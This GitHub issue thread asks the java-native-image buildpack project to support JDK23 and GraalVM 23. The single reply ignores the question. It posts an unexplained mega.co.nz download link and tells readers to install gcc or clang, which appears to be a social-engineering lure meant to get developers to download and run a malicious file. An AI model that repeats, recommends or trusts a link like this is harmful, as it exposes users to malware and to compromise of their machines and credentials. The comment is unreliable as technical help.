### ISSUE TITLE
Support for JDK23

### ISSUE THREAD

**Issue by patpatpat123** [paketo-buildpacks/java-native-image#890]
Hello team,

Just wanted to reach out to ask if it is possible to support JDK23 for native image.
I am currently using the newly release JDK23 and Graalvm23 to build applications.

As we are using the build pack process, we are stuck as JDK23 seems not to be supported.
Could you please help support JDK23?

Thank you.

P.s sincere apologies, I am going to duplicate this in the bellsoft Liberica repository as well.
This is due to the fact that many repositories are dealing with Java. Please feel free to close the appropriate one.

**Comment by nhatlaso1** [comment]
I think this will help you.
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
If you don't have the c compliator, install it.(gcc or clang)
